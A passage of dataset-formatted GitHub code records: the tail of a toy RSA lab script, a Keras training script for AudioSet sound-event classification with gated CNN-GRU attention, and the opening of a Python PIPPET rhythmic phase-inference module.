fn\nprint(d)\n\n# зашифровка сообщения\nm = 10\nc = m ** e % n\n\n# расшифровка сообщения\nprint(c ** d % n)","repo_name":"Lashy-Danya/Semestr_6","sub_path":"cryptography/lab_6/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20203456935","text":"\"\"\"\nSummary: DCASE 2017 task 4 Large-scale weakly supervised \n sound event detection for smart cars. Ranked 1 in DCASE 2017 Challenge.\nAuthor: Yong Xu, Qiuqiang Kong\nCreated: 03/04/2017\nModified: 31/10/2017\n\"\"\"\nfrom __future__ import print_function \nimport sys\ntry:\n import cPickle\nexcept BaseException:\n print('cPickle not found, use _pickle instead ...')\n import _pickle as cPickle\n\nimport numpy as np\nimport argparse\nimport glob\nimport time\nimport os\n\nimport keras\nfrom keras import backend as K\nfrom keras.models import Sequential,Model, load_model, model_from_json\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten, Reshape, Permute,Lambda, RepeatVector\nfrom keras.layers.convolutional import ZeroPadding2D, AveragePooling2D, Conv2D,MaxPooling2D, Convolution1D,MaxPooling1D\nfrom keras.layers.pooling import GlobalMaxPooling2D\nfrom keras.layers import Input, merge #, Merge not found\nfrom keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, LearningRateScheduler\nfrom keras.layers import LSTM, SimpleRNN, GRU, TimeDistributed, Bidirectional, Activation\nfrom keras.layers.normalization import BatchNormalization\nimport h5py\nfrom keras.layers.merge import Multiply\nfrom sklearn import preprocessing\nimport random\nfrom keras.optimizers import Adam\n\n# import config as cfg\nfrom prepare_data import create_folder, load_hdf5_data, do_scale\nfrom data_generator import RatioDataGenerator, QueueDataGenerator\n# from evaluation import io_task4, evaluate\n\nprint(sys.path[0])\nsys.path.insert(1, os.path.join(sys.path[0], '../'))\nsys.path.append(os.path.join(sys.path[0], '../vim/'))\nfrom vim import vim_params as vp\nfrom vim import tasksmq\nimport pandas as pd\nfrom utils import utilities\nimport tensorflow as tf\nfrom sklearn import metrics\nimport logging\n\ndef evaluate(model, input, target, stats_dir, probs_dir, iteration, labels_map):\n \"\"\"Evaluate a model.\n\n Args:\n model: object\n output: 2d array, (samples_num, classes_num)\n target: 2d array, (samples_num, classes_num)\n stats_dir: str, directory to write out statistics.\n probs_dir: str, directory to write out output (samples_num, classes_num)\n iteration: int\n\n Returns:\n None\n \"\"\"\n\n utilities.create_folder(stats_dir)\n utilities.create_folder(probs_dir)\n\n # Predict presence probabilittarget\n callback_time = time.time()\n # (clips_num, time_steps, freq_bins) = input.shape\n # (input, target) = utilities.transform_data(input, target)\n\n output = model.predict(input)\n output = output.astype(np.float32) # (clips_num, classes_num)\n\n # Write out presence probabilities\n prob_path = os.path.join(probs_dir, \"prob_{}_iters.p\".format(iteration))\n cPickle.dump(output, open(prob_path, 'wb'))\n\n # Calculate statistics\n stats = utilities.calculate_stats(output, target, labels_map)\n\n # Write out statistics\n stat_path = os.path.join(stats_dir, \"stat_{}_iters.p\".format(iteration))\n cPickle.dump(stats, open(stat_path, 'wb'))\n\n mAP = np.mean([stat['AP'] for stat in stats])\n mAUC = np.mean([stat['auc'] for stat in stats])\n logging.info(\n \"mAP: {:.6f}, AUC: {:.6f}, Callback time: {:.3f} s\".format(\n mAP, mAUC, time.time() - callback_time))\n\n if False:\n logging.info(\"Saveing prob to {}\".format(prob_path))\n logging.info(\"Saveing stat to {}\".format(stat_path))\n\n print('mAP: ', mAP)\n return mAP, mAUC, [stat['AP'] for stat in stats]\n\n# def f1(y_true, y_pred):\n# def recall(y_true, y_pred):\n# \"\"\"Recall metric.\n\n# Only computes a batch-wise average of recall.\n\n# Computes the recall, a metric for multi-label classification of\n# how many relevant items are selected.\n# \"\"\"\n# true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n# possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n# recall = true_positives / (possible_positives + K.epsilon())\n# return recall\n\n# def precision(y_true, y_pred):\n# \"\"\"Precision metric.\n\n# Only computes a batch-wise average of precision.\n\n# Computes the precision, a metric for multi-label classification of\n# how many selected items are relevant.\n# \"\"\"\n# true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n# predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n# precision = true_positives / (predicted_positives + K.epsilon())\n# return precision\n# precision = precision(y_true, y_pred)\n# recall = recall(y_true, y_pred)\n# return 2*((precision*recall)/(precision+recall+K.epsilon()))\n\n# CNN with Gated linear unit (GLU) block\ndef block(input):\n cnn = Conv2D(128, (3, 3), padding=\"same\", activation=\"linear\", use_bias=False)(input)\n cnn = BatchNormalization(axis=-1)(cnn)\n\n cnn1 = Lambda(slice1, output_shape=slice1_output_shape)(cnn)\n cnn2 = Lambda(slice2, output_shape=slice2_output_shape)(cnn)\n\n cnn1 = Activation('linear')(cnn1)\n cnn2 = Activation('sigmoid')(cnn2)\n\n out = Multiply()([cnn1, cnn2])\n return out\n\ndef slice1(x):\n return x[:, :, :, 0:64]\n\ndef slice2(x):\n return x[:, :, :, 64:128]\n\ndef slice1_output_shape(input_shape):\n return tuple([input_shape[0],input_shape[1],input_shape[2],64])\n\ndef slice2_output_shape(input_shape):\n return tuple([input_shape[0],input_shape[1],input_shape[2],64])\n\n# Attention weighted sum\ndef outfunc(vects):\n cla, att = vects # (N, n_time, n_out), (N, n_time, n_out)\n att = K.clip(att, 1e-7, 1.)\n out = K.sum(cla * att, axis=1) / K.sum(att, axis=1) # (N, n_out)\n return out\n\n# Train model\ndef train(args):\n data_dir = args.data_dir\n workspace = args.workspace\n balance_type = args.balance_type\n filename = args.filename\n model_type = args.model_type\n\n # Output directories\n sub_dir = os.path.join(filename,\n 'balance_type={}'.format(balance_type),\n 'model_type={}'.format(model_type),\n 'sr={}'.format(vp.feature_sr))\n\n models_dir = os.path.join(workspace, \"models\", sub_dir)\n utilities.create_folder(models_dir)\n\n stats_dir = os.path.join(workspace, \"stats\", sub_dir)\n utilities.create_folder(stats_dir)\n\n probs_dir = os.path.join(workspace, \"probs\", sub_dir)\n utilities.create_folder(probs_dir)\n\n # \n num_classes = vp.TOTAL_NUM_CLASS\n batch_size = vp.BATCH_SIZE\n\n df = pd.read_csv(vp.FILE_CLASS_LABELS)\n labels_dict = {}\n labels_dict['name'] = np.array(df[df['transfer'] == 1]['display_name'])\n labels_dict['id'] = np.array(df[df['transfer'] == 1]['index'])\n labels_dict['count'] = []\n\n # Load training & testing data\n # (tr_x, tr_y, tr_na_list) = load_hdf5_data(args.tr_hdf5_path, verbose=1)\n # (te_x, te_y, te_na_list) = load_hdf5_data(args.te_hdf5_path, verbose=1)\n # print(\"tr_x.shape: %s\" % (tr_x.shape,))\n\n # # Scale data\n # tr_x = do_scale(tr_x, args.scaler_path, verbose=1)\n # te_x = do_scale(te_x, args.scaler_path, verbose=1)\n # (_, n_time, n_freq) = tr_x.shape # (N, 240, 64)\n\n # Load testing data\n (test_x, test_y) = load_test_data(data_dir, labels_dict)\n\n # Build model\n\n # Data generator\n gen = QueueDataGenerator(batch_size=batch_size, type='train')\n batch_x, _ = next(gen.generate())\n (_, n_time, n_freq) = batch_x.shape # model change dynamically\n print('n_time ', n_time, 'n_freq ', n_freq)\n\n input_logmel = Input(shape=(n_time, n_freq), name='in_layer') # (N, 240, 64)\n print(input_logmel)\n\n a1 = Reshape((n_time, n_freq, 1))(input_logmel) # (N, 240, 64, 1)\n \n a1 = block(a1)\n a1 = block(a1)\n a1 = MaxPooling2D(pool_size=(1, 2))(a1) # (N, 240, 32, 128)\n \n a1 = block(a1)\n a1 = block(a1)\n a1 = MaxPooling2D(pool_size=(1, 2))(a1) # (N, 240, 16, 128)\n \n a1 = block(a1)\n a1 = block(a1)\n a1 = MaxPooling2D(pool_size=(1, 2))(a1) # (N, 240, 8, 128)\n \n a1 = block(a1)\n a1 = block(a1)\n a1 = MaxPooling2D(pool_size=(1, 2))(a1) # (N, 240, 4, 128)\n \n a1 = Conv2D(256, (3, 3), padding=\"same\", activation=\"relu\", use_bias=True)(a1)\n a1 = MaxPooling2D(pool_size=(1, 4))(a1) # (N, 240, 1, 256)\n \n a1 = Reshape((n_time, 256))(a1) # (N, 240, 256) bugfix: replace n_time for 240\n \n # Gated BGRU\n rnnout = Bidirectional(GRU(128, activation='linear', return_sequences=True))(a1)\n rnnout_gate = Bidirectional(GRU(128, activation='sigmoid', return_sequences=True))(a1)\n a2 = Multiply()([rnnout, rnnout_gate])\n \n # Attention\n cla = TimeDistributed(Dense(num_classes, activation='sigmoid'), name='localization_layer')(a2)\n att = TimeDistributed(Dense(num_classes, activation='softmax'))(a2)\n out = Lambda(outfunc, output_shape=(num_classes,))([cla, att])\n\n model = Model(input_logmel, out)\n\n # del model\n # load h5 model\n # save_out_path = os.path.join(\n # models_dir, \"md_{}_iters.h5\".format(18000))\n # model = load_model(save_out_path)\n\n # load json and create model\n # save_out_path = os.path.join(\n # models_dir, \"model.{}\".format(1500))\n # json_file = open(save_out_path + '.json', 'r')\n # loaded_model_json = json_file.read()\n # json_file.close()\n # model = model_from_json(loaded_model_json)\n # model.load_weights(save_out_path + '.weights.h5') # load weights into new model\n # print(\"Loaded model from disk\")\n\n model.summary()\n\n # Compile model\n # optimizer = Adam(lr=1e-3)\n model.compile(loss='binary_crossentropy', optimizer='adam')\n\n iteration = 0\n call_freq = 500\n train_time = time.time()\n\n for (batch_x, batch_y) in gen.generate():\n\n # Compute stats every several interations\n if (iteration % call_freq == 0) and (iteration != 0):\n\n logging.info(\"------------------\")\n\n logging.info(\n \"Iteration: {}, train time: {:.3f} s\".format(\n iteration, time.time() - train_time))\n\n # logging.info(\"Balance train statistics:\")\n # evaluate(\n # model=model,\n # input=bal_train_x,\n # target=bal_train_y,\n # stats_dir=os.path.join(stats_dir, 'bal_train'),\n # probs_dir=os.path.join(probs_dir, 'bal_train'),\n # iteration=iteration)\n\n logging.info(\"Test statistics:\")\n mAP, _, AP = evaluate(\n model=model,\n input=test_x,\n target=test_y,\n stats_dir=os.path.join(stats_dir, \"test\"),\n probs_dir=os.path.join(probs_dir, \"test\"),\n iteration=iteration,\n labels_map=labels_dict['id'])\n\n labels_dict['AP'] = AP\n for (name, ap) in zip(labels_dict['name'], labels_dict['AP']):\n print(name, '\\t', ap) \n train_time = time.time()\n\n # Update params\n # (batch_x, batch_y) = utilities.transform_data(batch_x, batch_y) !!!!\n cost = model.train_on_batch(x=batch_x, y=batch_y)\n if (iteration % 10) == 0:\n print(iteration,':', cost)\n\n iteration += 1\n \n # Save model\n if (iteration % 500) == 0:\n # save_out_path = os.path.join(\n # models_dir, \"md_{}_iters.h5\".format(iteration))\n # model.save(save_out_path)\n\n # serialize model to JSON\n save_out_path = os.path.join(\n models_dir, \"model.{}\".format(iteration))\n model_json = model.to_json()\n with open(save_out_path + '.json', \"w\") as json_file:\n json_file.write(model_json)\n # serialize weights to HDF5\n model.save_weights(save_out_path + '.weights.h5')\n print(\"Saved model to disk\")\n\n # Stop training when maximum iteration achieves\n if iteration == 50001:\n break\n\n # def as_keras_metric(method):\n # import functools\n # from keras import backend as K\n # import tensorflow as tf\n # @functools.wraps(method)\n # def wrapper(self, args, **kwargs):\n # \"\"\" Wrapper for turning tensorflow metrics into keras metrics \"\"\"\n # value, update_op = method(self, args, **kwargs)\n # K.get_session().run(tf.local_variables_initializer())\n # with tf.control_dependencies([update_op]):\n # value = tf.identity(value)\n # return value\n # return wrapper\n\n # precision = as_keras_metric(tf.metrics.precision)\n # recall = as_keras_metric(tf.metrics.recall)\n \n # @as_keras_metric\n # def auc_pr(y_true, y_pred, curve='PR'):\n # return tf.metrics.auc(y_true, y_pred, curve=curve)\n\n # @as_keras_metric\n # def mAP(y_true, y_pred):\n # _, m_ap = tf.metrics.average_precision_at_k(y_true, y_pred, 5)\n # return m_ap\n\n # return metrics.average_precision_score(y_true, y_pred, average=None)\n # _, m_ap = tf.metrics.average_precision_at_k(y_true, y_pred, k) k= 5 # return m_ap\n\n # metrics=['accuracy', precision, recall, auc_pr]) # 'accuracy', mAP\n # metrics=['accuracy', mAP]) # 'accuracy', mAP\n\n # Save model callback\n # filepath = os.path.join('/work/audio/audioset_classification/work/models', \n # \"gatedAct_rationBal44_lr0.001_normalization_at_cnnRNN_64newMel_240fr.{epoch:02d}-{val_acc:.4f}.hdf5\")\n # create_folder(os.path.dirname(filepath))\n # save_model = ModelCheckpoint(filepath=filepath,\n # monitor='val_acc', \n # verbose=0,\n # save_best_only=False,\n # save_weights_only=False,\n # mode='auto',\n # period=1) # each epoch??? \n\n # Data generator\n # gen = RatioDataGenerator(batch_size=44, type='train')\n\n # Train\n # model.fit_generator(generator=gen.generate(), \n # steps_per_epoch=500, # iters is called an 'epoch', old val: 100\n # epochs=101, # Maximum 'epoch' to train, old val: 31\n # verbose=1, \n # callbacks=[save_model], \n # validation_data=(te_x, te_y))\n\ndef load_test_data(data_dir, labels_dict):\n labels_map_mask = [False] * vp.TOTAL_NUM_CLASS\n for x in labels_dict['id']:\n labels_map_mask[x] = True\n\n # Load data\n load_time = time.time()\n\n # train_x = []\n # train_y = []\n # train_id_list = []\n test_x = []\n test_y = []\n test_id_list = []\n\n # early_stop = 0\n for aclass in labels_dict['name']:\n print(aclass)\n\n # local_train_x = []\n # local_train_y = []\n # local_train_id_list = []\n local_test_x = []\n local_test_y = []\n local_test_id_list = []\n\n # # Path of hdf5 data\n # bal_train_hdf5_path = os.path.join(data_dir, aclass, \"balanced_train_segments.hdf5\")\n # unbal_train_hdf5_path = os.path.join(data_dir, aclass, \"unbalanced_train_segments.hdf5\")\n test_hdf5_path = os.path.join(data_dir, aclass, \"eval_segments.hdf5\")\n\n # if mini_data:\n # # Only load balanced data\n # (bal_train_x, bal_train_y, bal_train_id_list) = utilities.load_data(\n # bal_train_hdf5_path)\n\n # local_train_x = bal_train_x\n # local_train_y = bal_train_y\n # local_train_id_list = bal_train_id_list\n\n # else:\n # # Load both balanced and unbalanced data\n # (bal_train_x, bal_train_y, bal_train_id_list) = utilities.load_data(\n # bal_train_hdf5_path)\n\n # (unbal_train_x, unbal_train_y, unbal_train_id_list) = utilities.load_data(\n # unbal_train_hdf5_path)\n\n # local_train_x = np.concatenate((bal_train_x, unbal_train_x))\n # local_train_y = np.concatenate((bal_train_y, unbal_train_y))\n # local_train_id_list = bal_train_id_list + unbal_train_id_list\n\n # labels_dict['count'].append(len(local_train_id_list))\n # Test data\n (local_test_x, local_test_y, local_test_id_list) = utilities.load_data(test_hdf5_path)\n print('local_test: ', local_test_x.shape, local_test_y.shape)\n\n # train_x = ( local_train_x if (train_x == []) else np.concatenate((train_x, local_train_x)) )\n # train_y = ( local_train_y if (train_y == []) else np.concatenate((train_y, local_train_y)) )\n # train_id_list = train_id_list + local_train_id_list\n test_x = ( local_test_x if (test_x == []) else np.concatenate((test_x, local_test_x)) )\n test_y = ( local_test_y if (test_y == []) else np.concatenate((test_y, local_test_y)) )\n test_id_list = test_id_list + local_test_id_list\n\n # # Mask other classes.\n # for ii, item in enumerate(train_y):\n # train_y[ii] = np.logical_and(item, labels_map_mask)\n for ii, item in enumerate(test_y):\n test_y[ii] = np.logical_and(item, labels_map_mask)\n\n for ii, item in enumerate(test_y):\n if not any(item):\n print(test_id_list[ii])\n print(ii, item)\n raise Exception('False item, no positive label.')\n\n test_x_mfcc, test_y_mfcc, test_seq_len = tasksmq.batch_wav_to_mfcc_parallel(test_x, test_y, agumentation=False) # test_seq_len = np.ones(len(test_x_mfcc)) * 240 # length array of the batch\n print(\"Loading data time: {:.3f} s\".format(time.time() - load_time))\n\n return test_x_mfcc, test_y_mfcc\n\n# Run function in mini-batch to save memory. \n# def run_func(func, x, batch_size):\n# pred_all = []\n# batch_num = int(np.ceil(len(x) / float(batch_size)))\n# for i1 in xrange(batch_num):\n# batch_x = x[batch_size * i1 : batch_size * (i1 + 1)]\n# [preds] = func([batch_x, 0.])\n# pred_all.append(preds)\n# pred_all = np.concatenate(pred_all, axis=0)\n# return pred_all\n\n# # Recognize and write probabilites. \n# def recognize(args, at_bool, sed_bool):\n# (te_x, te_y, te_na_list) = load_hdf5_data(args.te_hdf5_path, verbose=1)\n# x = te_x\n# y = te_y\n# na_list = te_na_list\n \n# x = do_scale(x, args.scaler_path, verbose=1)\n \n# fusion_at_list = []\n# fusion_sed_list = []\n# for epoch in range(20, 30, 1):\n# t1 = time.time()\n# [model_path] = glob.glob(os.path.join(args.model_dir, \n# \"*.%02d-0.*.hdf5\" % epoch))\n# model = load_model(model_path)\n \n# # Audio tagging\n# if at_bool:\n# pred = model.predict(x)\n# fusion_at_list.append(pred)\n \n# # Sound event detection\n# if sed_bool:\n# in_layer = model.get_layer('in_layer')\n# loc_layer = model.get_layer('localization_layer')\n# func = K.function([in_layer.input, K.learning_phase()], \n# [loc_layer.output])\n# pred3d = run_func(func, x, batch_size=20)\n# fusion_sed_list.append(pred3d)\n \n# print(\"Prediction time: %s\" % (time.time() - t1,))\n \n# # Write out AT probabilities\n# if at_bool:\n# fusion_at = np.mean(np.array(fusion_at_list), axis=0)\n# print(\"AT shape: %s\" % (fusion_at.shape,))\n# io_task4.at_write_prob_mat_to_csv(\n# na_list=na_list, \n# prob_mat=fusion_at, \n# out_path=os.path.join(args.out_dir, \"at_prob_mat.csv.gz\"))\n \n# # Write out SED probabilites\n# if sed_bool:\n# fusion_sed = np.mean(np.array(fusion_sed_list), axis=0)\n# print(\"SED shape:%s\" % (fusion_sed.shape,))\n# io_task4.sed_write_prob_mat_list_to_csv(\n# na_list=na_list, \n# prob_mat_list=fusion_sed, \n# out_path=os.path.join(args.out_dir, \"sed_prob_mat_list.csv.gz\"))\n \n# print(\"Prediction finished!\")\n\n# # Get stats from probabilites. \n# def get_stat(args, at_bool, sed_bool):\n# lbs = cfg.lbs\n# step_time_in_sec = cfg.step_time_in_sec\n# max_len = cfg.max_len\n# thres_ary = [0.3] * len(lbs)\n\n# # Calculate AT stat\n# if at_bool:\n# pd_prob_mat_csv_path = os.path.join(args.pred_dir, \"at_prob_mat.csv.gz\")\n# at_stat_path = os.path.join(args.stat_dir, \"at_stat.csv\")\n# at_submission_path = os.path.join(args.submission_dir, \"at_submission.csv\")\n \n# at_evaluator = evaluate.AudioTaggingEvaluate(\n# weak_gt_csv=\"meta_data/groundtruth_weak_label_testing_set.csv\", \n# lbs=lbs)\n \n# at_stat = at_evaluator.get_stats_from_prob_mat_csv(\n# pd_prob_mat_csv=pd_prob_mat_csv_path, \n# thres_ary=thres_ary)\n \n# # Write out & print AT stat\n# at_evaluator.write_stat_to_csv(stat=at_stat, \n# stat_path=at_stat_path)\n# at_evaluator.print_stat(stat_path=at_stat_path)\n \n# # Write AT to submission format\n# io_task4.at_write_prob_mat_csv_to_submission_csv(\n# at_prob_mat_path=pd_prob_mat_csv_path, \n# lbs=lbs, \n# thres_ary=at_stat['thres_ary'], \n# out_path=at_submission_path)\n \n# # Calculate SED stat\n# if sed_bool:\n# sed_prob_mat_list_path = os.path.join(args.pred_dir, \"sed_prob_mat_list.csv.gz\")\n# sed_stat_path = os.path.join(args.stat_dir, \"sed_stat.csv\")\n# sed_submission_path = os.path.join(args.submission_dir, \"sed_submission.csv\")\n \n# sed_evaluator = evaluate.SoundEventDetectionEvaluate(\n# strong_gt_csv=\"meta_data/groundtruth_strong_label_testing_set.csv\", \n# lbs=lbs, \n# step_sec=step_time_in_sec, \n# max_len=max_len)\n \n# # Write out & print SED stat\n# sed_stat = sed_evaluator.get_stats_from_prob_mat_list_csv(\n# pd_prob_mat_list_csv=sed_prob_mat_list_path, \n# thres_ary=thres_ary)\n \n# # Write SED to submission format\n# sed_evaluator.write_stat_to_csv(stat=sed_stat, \n# stat_path=sed_stat_path) \n# sed_evaluator.print_stat(stat_path=sed_stat_path)\n \n# # Write SED to submission format\n# io_task4.sed_write_prob_mat_list_csv_to_submission_csv(\n# sed_prob_mat_list_path=sed_prob_mat_list_path, \n# lbs=lbs, \n# thres_ary=thres_ary, \n# step_sec=step_time_in_sec, \n# out_path=sed_submission_path)\n \n# print(\"Calculating stat finished!\")\n\nif __name__ == '__main__':\n # parser = argparse.ArgumentParser(description=\"\")\n # subparsers = parser.add_subparsers(dest='mode')\n \n # parser_train = subparsers.add_parser('train')\n # parser_train.add_argument('--tr_hdf5_path', type=str)\n # parser_train.add_argument('--te_hdf5_path', type=str)\n # parser_train.add_argument('--scaler_path', type=str)\n # parser_train.add_argument('--out_model_dir', type=str)\n \n # parser_recognize = subparsers.add_parser('recognize')\n # parser_recognize.add_argument('--te_hdf5_path', type=str)\n # parser_recognize.add_argument('--scaler_path', type=str)\n # parser_recognize.add_argument('--model_dir', type=str)\n # parser_recognize.add_argument('--out_dir', type=str)\n \n # parser_get_stat = subparsers.add_parser('get_stat')\n # parser_get_stat.add_argument('--pred_dir', type=str)\n # parser_get_stat.add_argument('--stat_dir', type=str)\n # parser_get_stat.add_argument('--submission_dir', type=str)\n \n # args = parser.parse_args()\n \n # if args.mode == 'train':\n # train(args)\n # elif args.mode == 'recognize':\n # recognize(args, at_bool=True, sed_bool=True)\n # elif args.mode == 'get_stat':\n # get_stat(args, at_bool=True, sed_bool=True)\n # else:\n # raise Exception(\"Incorrect argument!\")\n\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument('--workspace', type=str, required=True)\n # parser.add_argument('--data_dir', type=str, required=True)\n\n parser.add_argument('--balance_type', type=str,\n default='balance_in_batch',\n choices=['no_balance', 'balance_in_batch'])\n\n parser.add_argument('--model_type', type=str, required=True,\n choices=['crnn_sed', \n 'decision_level_average_pooling', \n 'decision_level_single_attention',\n 'decision_level_multi_attention',\n 'feature_level_attention'])\n\n subparsers = parser.add_subparsers(dest='mode')\n parser_train = subparsers.add_parser('train')\n\n args = parser.parse_args()\n args.filename = utilities.get_filename(__file__)\n args.data_dir = vp.DATA_DIR\n if args.mode == 'train':\n train(args)\n","repo_name":"quentin-wang/audioset_classification","sub_path":"keras/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":25185,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"32149034019","text":"'''\nPIPPET: Phase Inference from Point Process Event Timing [1]\n + mPIPPET: multiple event streams [1]\n + pPIPPET: pattern inference [2]\n + oscPIPPET: oscillatory PIPPET\n\nPython variant of Jonathan Cannon's original MATLAB implementation:\n https://github.com/joncannon/PIPPET\n\n\nTODO:\n- Gradients for pPIPPET\n- Refactor for mpPIPPET, multi-stream per template\n\n[1] Expectancy-based rhythmic entrainment as continuous Bayesian inference.\n Cannon J (2021) PLOS Computational Biology 17(6): e1009025.\n[2] Modeling enculturated bias in entrainment to rhythmic patterns.\n Kaplan T, Cannon J, Jamone L & Pearce M (2021) - In Review.\n\n@Tom Kaplan: t.m.kaplan@qmul.ac.uk\n'''\nfrom __future__ import annotations\nimport numpy as np\nfrom abc import ABC, abstractmethod\nfrom collections import defaultdict\nfrom dataclasses import dataclass, field\nfrom scipy.stats import norm\n\nTWO_PI = 2 * np.pi\n\n@dataclass(init=True, repr=True)\nclass TemplateParams:\n ''' Expectation template and respective (stimulus) event timing '''\n e_times: np.ndarray # Observed event times\n e_means: np.ndarray # Expected event times (mean phase)\n e_vars: np.ndarray # Variance of expected event times\n e_lambdas: np.ndarray # Strength of expected event times\n label: str # Identifier/label for analysis\n\n def reset(self, means: np.ndarray, vars_: np.ndarray, lambdas: np.ndarray) -> None:\n self.e_means = means\n self.e_vars = vars_\n self.e_lambdas = lambdas\n\n@dataclass(init=True, repr=True)\nclass PIPPETParams:\n ''' Configuration for PIPPET model - parameters and expectation templates '''\n templates: list = field(default_factory=list)\n\n lambda_0: float = 0.01 # Background event expectation strength\n mu_0: float = 0.0 # Initial estimated phase\n V_0: float = 0.0002 # Initial variance\n sigma_phi: float = 0.05 # Generative model phase noise\n\n eta_mu: float = 0.0 # Internal phase noise\n eta_V: float = 0.0 # Internal variance noise\n eta_e: float = 0.0 # Internal event noise\n eta_e_share: bool = False # Shared event noise across templates (for pPIPPET, set True)\n\n dt: float = 0.001 # Integration time step\n overtime: float = 0.0 # Time buffer for simulation\n t0: float = 0.0 # Starting time for simulation with respect to event times\n tmax: float = np.nan # Maximum time for simulation (otherwise based on event times)\n\n tau: float = 1.0 # Tempo-like dial for oscPIPPET\n\n def add(self, times: np.ndarray, means: np.ndarray, vars_: np.ndarray, lambdas: np.ndarray,\n label: str) -> None:\n ''' Add an expectation template, which corresponds to either:\n (1) a unique event stream for mPIPPET,\n (2) a separate expectation template for pPIPPET\n '''\n self.templates.append(TemplateParams(times, means, vars_, lambdas, label))\n\nclass PIPPETStream:\n ''' Variational filtering equations for PIPPET, see Methods of [1] or [2] '''\n\n def __init__(self, params: TemplateParams, lambda_0: float):\n self.params = params\n self.lambda_0 = lambda_0\n self.e_times_p = params.e_times\n # For oscPIPPET:\n self.M = np.arange(-40, 40+1, 1)\n self.cs = np.empty((self.params.e_means.size, self.M.size), dtype=np.clongdouble)\n self.e_means_ = self.params.e_means.reshape(-1, 1)\n self.e_vars_ = self.params.e_vars.reshape(-1, 1)\n\n @staticmethod\n def z_mu_V(z: complex) -> tuple[float,float]:\n return np.angle(z), -2*np.log(np.abs(z))\n\n def mu_i(self, mu: float, V: float) -> float:\n return (mu/V + self.params.e_means/self.params.e_vars)/(1/V + 1/self.params.e_vars)\n\n def K_i(self, V: float) -> float:\n return 1/(1/V + 1/self.params.e_vars)\n\n def lambda_i(self, mu: float, V: float) -> float:\n gauss = norm.pdf(mu, loc=self.params.e_means, scale=(self.params.e_vars + V)**0.5)\n return self.params.e_lambdas * gauss\n\n def lambda_hat(self, mu: float, V:float) -> float:\n return self.lambda_0 + np.sum(self.lambda_i(mu, V))\n\n def mu_hat(self, mu: float, V: float) -> float:\n mu_hat = self.lambda_0 * mu\n mu_hat += np.sum(self.lambda_i(mu, V) * self.mu_i(mu, V))\n return mu_hat / self.lambda_hat(mu, V)\n\n def V_hat(self, mu_curr: float, mu_prev: float, V: float) -> float:\n V_hat = self.lambda_0 * (V + (mu_prev-mu_curr)**2)\n a = self.lambda_i(mu_prev, V)\n b = self.K_i(V) + (self.mu_i(mu_prev, V)-mu_curr)**2\n V_hat += np.sum(a * b)\n return V_hat / self.lambda_hat(mu_prev, V)\n\n def zlambda(self, mu: float, V: float, tau: float) -> float:\n self.cs.real = -(self.M**2) * ((V+self.params.e_vars)/2).reshape(-1, 1)\n self.cs.imag = -self.M*(mu - self.params.e_means).reshape(-1, 1)\n y = np.sum(self.params.e_lambdas*tau/TWO_PI * np.exp(self.cs).real.sum(axis=1))\n return self.lambda_0*tau/TWO_PI + y\n\n def z_hat(self, mu: float, V: float, blambda: float, tau: float) -> complex:\n self.cs.real = -(V*self.M**2)/2 - (self.e_vars_ * (self.M + 1)**2)/2\n self.cs.imag = -self.M*(mu - self.params.e_means).reshape(-1, 1) + self.e_means_\n z_hat_i = self.params.e_lambdas*tau/TWO_PI * np.exp(self.cs).sum(axis=1)\n y = self.lambda_0*tau/TWO_PI * np.exp(complex(-V/2, mu)) + np.sum(z_hat_i)\n return 1/blambda * y\n\nclass PIPPET(ABC):\n ''' Base class for PIPPET inference problems '''\n\n def __init__(self, params: PIPPETParams):\n self.params = params\n # Create unique streams/patterns for (mp)PIPPET filtering, based on params\n self.streams = []\n self.labels = []\n for p in params.templates:\n self.streams.append(PIPPETStream(p, params.lambda_0))\n self.labels.append(p.label)\n self.n_streams = len(self.streams)\n self.event_n = np.zeros(self.n_streams).astype(int)\n\n # Pre-compute shared internal noise, if appropriate\n if params.eta_e_share:\n noise = np.random.randn(*self.streams[0].e_times_p.shape) * self.params.eta_e\n for s_i in range(self.n_streams):\n self.streams[s_i].e_times_p += noise\n else:\n for s_i in range(self.n_streams):\n noise = np.random.randn(*self.streams[s_i].e_times_p.shape) * self.params.eta_e\n self.streams[s_i].e_times_p += noise\n # Ensure events (perturbed by noise) don't occur at negative time\n for s_i in range(self.n_streams):\n self.streams[s_i].e_times_p[self.streams[s_i].e_times_p < 0] = 0.0\n\n # Timing of simulation\n self.tmax = params.tmax if ~np.isnan(params.tmax) else max(s.e_times_p[-1] for s in self.streams)\n self.tmax += params.overtime\n self.ts = np.arange(self.params.t0, self.tmax+self.params.dt, step=self.params.dt)\n self.n_ts = self.ts.shape[0]\n # Initialise sufficient statistics\n self.mu_s = np.zeros(self.n_ts)\n self.mu_s[0] = self.params.mu_0\n self.V_s = np.zeros(self.n_ts)\n self.V_s[0] = self.params.V_0\n self.z_s = np.ones(self.n_ts, dtype=np.clongdouble)\n self.z_s[0] = np.exp(complex(-self.params.V_0/2, self.params.mu_0))\n self.idx_event = set()\n self.event_stream = defaultdict(set)\n # Gradient of Lambda\n self.grad = np.zeros((self.n_ts, self.n_streams))\n # Surprisal\n self.surp = np.zeros((self.n_ts, self.n_streams, 2))\n\n def is_onset(self, t_prev: float, t: float, s_i: int, stim: bool=True) -> bool:\n ''' Check whether an event is observed on this time-step '''\n evts = self.streams[s_i].e_times_p if stim else self.streams[s_i].params.e_means\n if self.event_n[s_i] < len(evts):\n return t_prev <= evts[self.event_n[s_i]] <= t\n return False\n\n def add_event(self, s_i: int, event_time: float) -> None:\n ''' Add a new event '''\n if self.streams[s_i].e_times_p.size > 0 and event_time < self.streams[s_i].e_times_p[-1]:\n raise ValueError('Existing observation time exceeds new event time')\n n_event = self.streams[s_i].e_times_p.size\n self.streams[s_i].e_times_p = np.insert(self.streams[s_i].e_times_p, n_event, event_time)\n\n @abstractmethod\n def step(self) -> tuple[float, float]:\n ''' Posterior update for a time step '''\n mu, V = None, None\n return mu, 